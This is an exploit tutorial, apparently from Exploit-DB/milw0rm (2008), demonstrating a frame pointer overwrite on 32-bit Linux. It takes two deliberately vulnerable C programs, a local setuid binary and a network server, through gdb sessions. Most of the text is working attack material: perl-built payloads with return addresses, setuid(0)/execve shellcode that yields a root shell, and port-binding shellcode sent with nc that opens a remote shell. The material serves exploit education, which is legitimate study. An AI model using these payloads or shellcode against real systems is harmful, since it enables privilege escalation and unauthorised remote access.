Frame Pointer Overwrite Demonstration [LINUX]

EDB-ID:

12994

CVE:

N/A


Platform:

Multiple

Published:

2008-12-01

Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]

Frame Pointer Overwrite Demonstration [LINUX]

This paper assumes you have read the proper background information and/or technical details about
the above subject. If not, please do so, because this read does not include key concepts but instead
technical exploitation examples. That being said, enjoy. Knowledge is power.

[PART 1 + LOCAL][PART 1 + LOCAL][PART 1 + LOCAL][PART 1 + LOCAL][PART 1 + LOCAL][PART 1 + LOCAL]

bugs@linux:~$ cat fpo.c
#include <stdio.h>

void die()
{

     printf("Protection Enabled!\n");
     exit(0);

}


void vuln(char *data)
{

     char buf[1024], buf2[12];
     int i = 0;

     memset(buf, 0, 1024);
if(strlen(data) < sizeof(buf)+sizeof(buf2)+1) { while(*data) buf[i++] = *data++; }
else { die(); }

}

int main(int argc, char *argv[])
{

if(argc < 2) { printf("usage: %s data\n", argv[0]); return 0; }

     vuln(argv[1]);

return 0;
}

bugs@linux:~$ gcc -o fpo fpo.c

This program is vulnerable to a buffer overflow. But, there are conditions.

With our environment in consideration, we need atleast 16 bytes over the buffer size to
overwrite the EIP. But this program only allows us to fill the buffer with around 1036 bytes.
If we go over 1036 bytes, it will tell us "Protection Enabled" and goto die(), which will end our program.

Now that you know what we're working with, lets see what we can do.

bugs@linux:~$ ./fpo
usage: ./fpo data
bugs@linux:~$ su
Password: 
root@linux:/home/bugs# chown root:root fpo && chmod 4755 fpo
root@linux:/home/bugs# exit
exit
bugs@linux:~$ ls -alh fpo
-rwsr-xr-x 1 root root 8.4K 2008-11-27 03:12 fpo*
bugs@linux:~$ gdb fpo
GNU gdb 6.5
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-linux-linux"...Using host libthread_db library "/lib/libthread_db.so.1".

(gdb) break main
Breakpoint 1 at 0x80484df
(gdb) disas vuln
Dump of assembler code for function vuln:
0x08048464 <vuln+0>:	push   %ebp
0x08048465 <vuln+1>:	mov    %esp,%ebp
0x08048467 <vuln+3>:	sub    $0x428,%esp
0x0804846d <vuln+9>:	movl   $0x0,0xfffffbe4(%ebp)
0x08048477 <vuln+19>:	sub    $0x4,%esp
0x0804847a <vuln+22>:	push   $0x400
0x0804847f <vuln+27>:	push   $0x0
0x08048481 <vuln+29>:	lea    0xfffffbf8(%ebp),%eax
0x08048487 <vuln+35>:	push   %eax
0x08048488 <vuln+36>:	call   0x8048358 <memset@plt>
0x0804848d <vuln+41>:	add    $0x10,%esp
0x08048490 <vuln+44>:	sub    $0xc,%esp
0x08048493 <vuln+47>:	pushl  0x8(%ebp)
0x08048496 <vuln+50>:	call   0x8048318 <strlen@plt>
0x0804849b <vuln+55>:	add    $0x10,%esp
0x0804849e <vuln+58>:	cmp    $0x40c,%eax
0x080484a3 <vuln+63>:	ja     0x80484d2 <vuln+110>
0x080484a5 <vuln+65>:	mov    0x8(%ebp),%eax
0x080484a8 <vuln+68>:	cmpb   $0x0,(%eax)
0x080484ab <vuln+71>:	je     0x80484d7 <vuln+115>
0x080484ad <vuln+73>:	mov    0xfffffbe4(%ebp),%eax
0x080484b3 <vuln+79>:	lea    0xfffffff8(%ebp),%edx
0x080484b6 <vuln+82>:	add    %edx,%eax
0x080484b8 <vuln+84>:	lea    0xfffffc00(%eax),%edx
0x080484be <vuln+90>:	mov    0x8(%ebp),%eax
0x080484c1 <vuln+93>:	incl   0x8(%ebp)
0x080484c4 <vuln+96>:	mov    (%eax),%al
0x080484c6 <vuln+98>:	mov    %al,(%edx)
0x080484c8 <vuln+100>:	lea    0xfffffbe4(%ebp),%eax
0x080484ce <vuln+106>:	incl   (%eax)
0x080484d0 <vuln+108>:	jmp    0x80484a5 <vuln+65>
0x080484d2 <vuln+110>:	call   0x8048444 <die>
0x080484d7 <vuln+115>:	leave  
0x080484d8 <vuln+116>:	ret    
End of assembler dump.
(gdb) break *vuln+115
Breakpoint 2 at 0x80484d7
(gdb) r `perl -e 'print "A" x 1040'`
Starting program: /home/bugs/fpo `perl -e 'print "A" x 1040'`

Breakpoint 1, 0x080484df in main ()
(gdb) c
Continuing.
Protection Enabled!

Program exited normally.
(gdb) r `perl -e 'print "A" x 1036'`
Starting program: /home/bugs/fpo `perl -e 'print "A" x 1036'`

Breakpoint 1, 0x080484df in main ()
(gdb) x/x $ebp
0xbffff0c8:	0xbffff0e8

*** 0xbffff0e8 --> _init saved ebp

(gdb) x/x $ebp+4
0xbffff0cc:	0x4004728b

*** 0x4004728b --> main()'s return address

(gdb) c
Continuing.

Breakpoint 2, 0x080484d7 in vuln ()
(gdb) x/12x $esp
0xbfffec70:	0x00000000	0x00000000	0x400174dc	0x0000040c
0xbfffec80:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffec90:	0x41414141	0x41414141	0x41414141	0x41414141

*** 0xbfffec90 --> buffer's address

(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x0804852c in main ()
(gdb) i r
eax            0xbffff65b	-1073744293
ecx            0x414141	4276545
edx            0xbffff09b	-1073745765
ebx            0x4015bff0	1075167216
esp            0xbffff0b0	0xbffff0b0
ebp            0x41414141	0x41414141
esi            0xbffff120	-1073745632
edi            0x2	2
eip            0x804852c	0x804852c <main+83>
eflags         0x10282	[ SF IF RF ]
cs             0x23	35
ss             0x2b	43
ds             0x2b	43
es             0x2b	43
fs             0x0	0
gs             0x0	0

We can overflow the buffer, but not enough to overwrite the EIP because of the 'protection' code. But
sometimes control of the EBP leads to control over the EIP as well.

So let's put our information together and see if we can smash this stack.

filler -> _init saved ebp  -> main()'s retaddr ->        target eip      -> buffer's address
[A * 8]->[\xe8\xf0\xff\xbf]->[\x8b\x72\x04\x40]->[\x41\x41\x41\x41 * 254]->[\x90\xec\xff\xbf]
8 bytes        4 bytes            4 bytes               1016 bytes              4 bytes

*Filler doesn't matter much, possibly helpful sometimes; increase target eip count if you don't want to use it*

Total size of payload: 1036 bytes

(gdb) r `perl -e 'print "A" x 8 . "\xe8\xf0\xff\xbf" . "\x8b\x72\x04\x40" . "\x41\x41\x41\x41" x 254 . "\x90\xec\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bugs/fpo `perl -e 'print "A" x 8 . "\xe8\xf0\xff\xbf" . "\x8b\x72\x04\x40" . "\x41\x41\x41\x41" x 254 . "\x90\xec\xff\xbf"'`

Breakpoint 1, 0x080484df in main ()
(gdb) c
Continuing.

Breakpoint 2, 0x080484d7 in vuln ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r
eax            0x0	0
ecx            0xbfffec	12582892
edx            0xbffff09b	-1073745765
ebx            0x4015bff0	1075167216
esp            0xbfffec98	0xbfffec98
ebp            0x41414141	0x41414141
esi            0xbffff120	-1073745632
edi            0x2	2
eip            0x41414141	0x41414141
eflags         0x10282	[ SF IF RF ]
cs             0x23	35
ss             0x2b	43
ds             0x2b	43
es             0x2b	43
fs             0x0	0
gs             0x0	0

As you can see, we have now overwritten the both the EBP and the EIP.

Let's get out of here and execute some code =)

(gdb) q
bugs@linux:~$ cat env.c
#include <stdlib.h>

int main(int argc, char *argv[])
{

     char *addr;

if(argc < 2) { printf("usage: %s <envvar>\n", argv[0]); return 0; }

     addr = getenv(argv[1]);
if(addr == NULL) { printf("[%s] not found!\n", argv[1]); return 0; }
     printf("[%s] @ %p\n", argv[1], addr);

return 0;
}

bugs@linux:~$ gcc -o env env.c
bugs@linux:~$ ./env
usage: ./env <envvar>
bugs@linux:~$ export NOPSC=`perl -e 'print "\x90" x 200 . "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
bugs@linux:~$ ./env NOPSC
[NOPSC] @ 0xbffff768
bugs@linux:~$ ./fpo `perl -e 'print "A" x 8 . "\xe8\xf0\xff\xbf" . "\x8b\x72\x04\x40" . "\x68\xf7\xff\xbf" x 254 . "\x90\xec\xff\xbf"'`
sh-3.1# id
uid=0(root) gid=100(users) groups=100(users)
sh-3.1# exit
exit
bugs@linux:~$

[PART 2 + REMOTE][PART 2 + REMOTE][PART 2 + REMOTE][PART 2 + REMOTE][PART 2 + REMOTE][PART 2 + REMOTE]

[Terminal #1]

#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define READSZ 2048

void die(int sock)
{

     printf("Protection Enabled!\n");
     close(sock);
}


void vuln(char *data, int sock)
{

     char buf[1024], buf2[12];
     int i = 0;

     memset(buf, 0, 1024);
if(strlen(data) < sizeof(buf)+sizeof(buf2)+1) { while(*data) buf[i++] = *data++; }
else if(strlen(data) < sizeof(buf)+sizeof(buf2)+1) { die(sock); }

}


int main(int argc, char *argv[])
{

if(argc < 2) { printf("Usage: %s port\n", argv[0]); return 0; }

     int z, cli, serv, port = atoi(argv[1]);

     struct sockaddr_in client, server;

     server.sin_family      = AF_INET;
     server.sin_port        = htons(port);
     server.sin_addr.s_addr = INADDR_ANY;

if((serv = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("Error: socket()\n"); return -1; }

if(bind(serv, (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1) { printf("Error: bind()\n"); return -1; }

if(listen(serv, 10) == -1) { printf("Error: listen()\n"); return -1; }

for(;;)
{

     cli = accept(serv, (struct sockaddr *)&client, &z);

if(readsock(cli) == -1) { printf("Error: readsock()\n"); close(cli); }

}

     return 0;
}

int readsock(int sock)
{

     char readbuf[READSZ];

     memset(readbuf, 0, READSZ);
     read(sock, readbuf, READSZ, 0);

     vuln(readbuf, sock);

     close(sock);

}

bugs@linux:~$ gcc -o fposerv fposerv.c
bugs@linux:~$ ./fposerv
Usage: ./fposerv port
bugs@linux:~$ gdb fposerv
GNU gdb 6.5
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-linux-linux"...Using host libthread_db library "/lib/libthread_db.so.1".

(gdb) break main
Breakpoint 1 at 0x8048673
(gdb) disas vuln
Dump of assembler code for function vuln:
0x080485da <vuln+0>:	push   %ebp
0x080485db <vuln+1>:	mov    %esp,%ebp
0x080485dd <vuln+3>:	sub    $0x428,%esp
0x080485e3 <vuln+9>:	movl   $0x0,0xfffffbe4(%ebp)
0x080485ed <vuln+19>:	sub    $0x4,%esp
0x080485f0 <vuln+22>:	push   $0x400
0x080485f5 <vuln+27>:	push   $0x0
0x080485f7 <vuln+29>:	lea    0xfffffbf8(%ebp),%eax
0x080485fd <vuln+35>:	push   %eax
0x080485fe <vuln+36>:	call   0x80484a8 <memset@plt>
0x08048603 <vuln+41>:	add    $0x10,%esp
0x08048606 <vuln+44>:	sub    $0xc,%esp
0x08048609 <vuln+47>:	pushl  0x8(%ebp)
0x0804860c <vuln+50>:	call   0x8048448 <strlen@plt>
0x08048611 <vuln+55>:	add    $0x10,%esp
0x08048614 <vuln+58>:	cmp    $0x40c,%eax
0x08048619 <vuln+63>:	ja     0x8048648 <vuln+110>
0x0804861b <vuln+65>:	mov    0x8(%ebp),%eax
0x0804861e <vuln+68>:	cmpb   $0x0,(%eax)
0x08048621 <vuln+71>:	je     0x804866b <vuln+145>
0x08048623 <vuln+73>:	mov    0xfffffbe4(%ebp),%eax
0x08048629 <vuln+79>:	lea    0xfffffff8(%ebp),%edx
0x0804862c <vuln+82>:	add    %edx,%eax
0x0804862e <vuln+84>:	lea    0xfffffc00(%eax),%edx
0x08048634 <vuln+90>:	mov    0x8(%ebp),%eax
0x08048637 <vuln+93>:	incl   0x8(%ebp)
0x0804863a <vuln+96>:	mov    (%eax),%al
0x0804863c <vuln+98>:	mov    %al,(%edx)
0x0804863e <vuln+100>:	lea    0xfffffbe4(%ebp),%eax
0x08048644 <vuln+106>:	incl   (%eax)
0x08048646 <vuln+108>:	jmp    0x804861b <vuln+65>
0x08048648 <vuln+110>:	sub    $0xc,%esp
0x0804864b <vuln+113>:	pushl  0x8(%ebp)
0x0804864e <vuln+116>:	call   0x8048448 <strlen@plt>
0x08048653 <vuln+121>:	add    $0x10,%esp
0x08048656 <vuln+124>:	cmp    $0x40c,%eax
0x0804865b <vuln+129>:	ja     0x804866b <vuln+145>
0x0804865d <vuln+131>:	sub    $0xc,%esp
0x08048660 <vuln+134>:	pushl  0xc(%ebp)
0x08048663 <vuln+137>:	call   0x80485b4 <die>
0x08048668 <vuln+142>:	add    $0x10,%esp
0x0804866b <vuln+145>:	leave  
0x0804866c <vuln+146>:	ret    
End of assembler dump.
(gdb) break *vuln+145
Breakpoint 2 at 0x804866b
(gdb) r 5555
Starting program: /home/bugs/fposerv 5555

Breakpoint 1, 0x08048673 in main ()
(gdb) x/x $ebp
0xbffff4c8:	0xbffff4e8
(gdb) x/x $ebp+4
0xbffff4cc:	0x4004728b
(gdb) c
Continuing.

[Terminal #2]

bugs@linux:~$ perl -e 'print "\x44\x43\x42\x41" x 259' | nc localhost 5555

[Terminal #1]

Breakpoint 2, 0x0804866b in vuln ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x08048825 in readsock ()
(gdb) i r
eax            0xbffff05c	-1073745828
ecx            0x0	0
edx            0xbfffec3b	-1073746885
ebx            0x4015bff0	1075167216
esp            0xbfffec44	0xbfffec44
ebp            0x41424344	0x41424344
esi            0xbffff520	-1073744608
edi            0x2	2
eip            0x8048825	0x8048825 <readsock+83>
eflags         0x10296	[ PF AF SF IF RF ]
cs             0x23	35
ss             0x2b	43
ds             0x2b	43
es             0x2b	43
fs             0x0	0
gs             0x0	0
(gdb) x/12x $esp
0xbfffec44:	0x00000007	0x00000800	0x00000000	0x41424344
0xbfffec54:	0x41424344	0x41424344	0x41424344	0x41424344
0xbfffec64:	0x41424344	0x41424344	0x41424344	0x41424344
(gdb) x/x 0xbfffec50
0xbfffec50:	0x41424344
(gdb) c
Continuing.

Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
(gdb) r 5555
Starting program: /home/bugs/fposerv 5555

Breakpoint 1, 0x08048673 in main ()
(gdb) c
Continuing.

[Terminal #2]

bugs@linux:~$ perl -e 'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" . "\x44\x43\x42\x41" x 254 . "\x50\xec\xff\xbf"' | nc localhost 5555

[Terminal #1]

Breakpoint 2, 0x0804866b in vuln ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x/x 0xbfffec50
0xbfffec50:	0x41414141
(gdb) x/x 0xbfffec60
0xbfffec60:	0x41424344
(gdb) c
Continuing.

Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
(gdb) r 5555
Starting program: /home/bugs/fposerv 5555

Breakpoint 1, 0x08048673 in main ()
(gdb) c
Continuing.

[Terminal #2]

bugs@linux:~$ perl -e 'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" . "\x44\x43\x42\x41" x 254 . "\x60\xec\xff\xbf"' | nc localhost 5555

[Terminal #1]

Program received signal SIGSEGV, Segmentation fault.
0x41424344 in ?? ()
(gdb) c
Continuing.

Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
(gdb) 

[Terminal #2]

bugs@linux:~$ pcalc 254*4 (previous return address buffer)
	1016    	0x3f8     	0y1111111000
bugs@linux:~$ pcalc 1016-800 (minus nops)
	216     	0xd8      	0y11011000
bugs@linux:~$ pcalc 216-84 (minus shellcode)
	132     	0x84      	0y10000100
bugs@linux:~$ pcalc 132/4 (new return address space)
	33      	0x21      	0y100001
bugs@linux:~$

[Terminal #1]

(gdb) r 5555
Starting program: /home/bugs/fposerv 5555

Breakpoint 1, 0x08048673 in main ()
(gdb) c
Continuing.

[Terminal #2]

bugs@linux:~$ perl -e 'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" . "\x44\x43\x42\x41" x 33 . "\x90" x 800 . "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x43\x68\xff\x02\xce\xec\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x60\xec\xff\xbf"' | nc localhost 5555

[Terminal #1]

Breakpoint 2, 0x0804866b in vuln ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x41424344 in ?? ()
(gdb) x/250x $esp    
0xbfffec68:	0x41424344	0x41424344	0x41424344	0x41424344
0xbfffec78:	0x41424344	0x41424344	0x41424344	0x41424344
0xbfffec88:	0x41424344	0x41424344	0x41424344	0x41424344
0xbfffec98:	0x41424344	0x41424344	0x41424344	0x41424344
0xbfffeca8:	0x41424344	0x41424344	0x41424344	0x41424344
0xbfffecb8:	0x41424344	0x41424344	0x41424344	0x41424344
0xbfffecc8:	0x41424344	0x41424344	0x41424344	0x41424344
0xbfffecd8:	0x41424344	0x41424344	0x41424344	0x90909090
0xbfffece8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffecf8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffed08:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffed18:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffed28:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffed38:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffed48:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffed58:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffed68:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffed78:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffed88:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffed98:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffeda8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffedb8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffedc8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffedd8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffede8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffedf8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffee08:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffee18:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffee28:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffee38:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffee48:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffee58:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffee68:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffee78:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffee88:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffee98:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffeea8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffeeb8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffeec8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffeed8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffeee8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffeef8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffef08:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffef18:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffef28:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffef38:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffef48:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffef58:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffef68:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffef78:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffef88:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffef98:	0x90909090	0x90909090	0x90909090	0x90909090
---Type <return> to continue, or q <return> to quit---
0xbfffefa8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffefb8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffefc8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffefd8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffefe8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffeff8:	0x90909090	0x90909090	0x90909090	0x6a58666a
0xbffff008:	0x52995b01	0x89026a53	0x5280cde1	0x02ff6843
0xbffff018:	0xe189ecce	0x5051106a	0xc689e189	0x80cd66b0
0xbffff028:	0x66b04343	0x565280cd	0xb043e189	0x8980cd66
0xbffff038:	0xb0c389d9	0x80cd493f	0x52f8e241	0x732f6e68
0xbffff048:	0x2f2f6868	0xe3896962
(gdb) d
Delete all breakpoints? (y or n) y
(gdb) r 5555
Starting program: /home/bugs/fposerv 5555

[Terminal #2]

Lets break down our final payload:

filler -> _init saved ebp  -> main()'s retaddr ->       target eip      ->     nops   ->    shellcode  -> buffer's address
[A * 8]->[\xe8\xf0\xff\xbf]->[\x8b\x72\x04\x40]->[\x08\xee\xff\xbf * 33]->[\x90 * 800]->[\x6a.....\x80]->[\x90\xec\xff\xbf]
8 bytes        4 bytes            4 bytes               132 bytes           800 bytes       84 bytes          4 bytes

Total size of payload: 1036 bytes

bugs@linux:~$ perl -e 'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" . "\x08\xee\xff\xbf" x 33 . "\x90" x 800 . "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x43\x68\xff\x02\xce\xec\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x60\xec\xff\xbf"' | nc localhost 5555
[CRTL+C]

bugs@linux:~$ netstat -antp | grep 52972
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 0.0.0.0:52972           0.0.0.0:*               LISTEN     7089/fposerv        
bugs@linux:~$ nc localhost 52972

[Terminal #1]

Program received signal SIGTRAP, Trace/breakpoint trap.
0x400007b0 in _start () from /lib/ld-linux.so.2
(gdb) c
Continuing.

[Terminal #2]

id
uid=1000(bugs) gid=100(users) groups=100(users)
exit
bugs@linux:~$

Questions. Comments. Concerns. --> 0xjbrown41@gmail.com

# milw0rm.com [2008-12-01]